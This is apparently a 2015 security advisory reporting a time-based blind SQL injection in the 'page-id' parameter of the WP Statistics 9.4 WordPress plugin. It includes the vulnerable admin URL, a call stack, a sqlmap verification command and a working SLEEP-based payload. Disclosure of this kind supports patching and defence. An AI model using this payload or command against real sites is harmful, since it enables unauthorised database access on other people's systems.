Subject: Blind SQL injection in WP Statistics 9.4
Date: Thu, 9 Jul 2015 00:07:59 +0200
Hello,
Plugin: WP Statistics 9.4
https://wordpress.org/plugins/wp-statistics/
Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).
1. SQL injection (
wp_statistics_pages()
)
Method: GET
Url:
http://localhost/wp-admin/admin.php?page=wp-statistics%2Fwp-statistics.php&type=top-pages&page-id=[sqli]&page-uri=2
Vulnerable parameter: page-id
Example PHP callstack:
wp_statistics_generate_page_postbox_content [/wp-statistics/includes/log/widgets/page.php:28]
wp_statistics_pages [/wp-statistics/includes/functions/functions.php:206]
wpdb::get_var
Sqlmap verification:
sqlmap --cookie "..." --dbms mysql -u "
http://localhost/wp-admin/admin.php?page=wp-statistics%2Fwp-statistics.php&type=top-pages&page-id=1&page-uri=2
" -p page-id --technique T --time-sec=2
...
Parameter: page-id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=wp-statistics/wp-statistics.php&type=top-pages&page-id=1 AND (SELECT * FROM (SELECT(SLEEP(2)))ZbFW)&page-uri=2
...
--
Regards,
Marcin Probola,